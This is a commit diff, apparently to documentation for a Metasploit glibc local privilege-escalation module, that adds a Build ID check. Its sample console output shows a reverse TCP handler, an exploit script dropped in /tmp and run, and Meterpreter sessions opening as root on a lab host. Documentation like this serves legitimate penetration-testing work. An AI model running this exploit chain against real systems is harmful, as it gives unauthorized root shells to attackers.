Check Build ID before running exploit

This commit is contained in:
Jack Heysel
2023-12-19 12:15:35 -05:00
parent e858628292
commit 4e61596e7a
2 changed files with 49 additions and 5 deletions
@@ -97,14 +97,12 @@ View the full module info with the info, or info -d command.
[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[*] Writing '/tmp/2Vkty.py' (13770 bytes) ...
[*] Running python3 /tmp/2Vkty.py
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.228
[+] Deleted /tmp/2Vkty.py
[*] Meterpreter session 2 opened (192.168.123.1:5555 -> 192.168.123.228:33522) at 2023-11-15 21:58:37 -0500
[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500
meterpreter > getuid
meterpreter >getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.123.228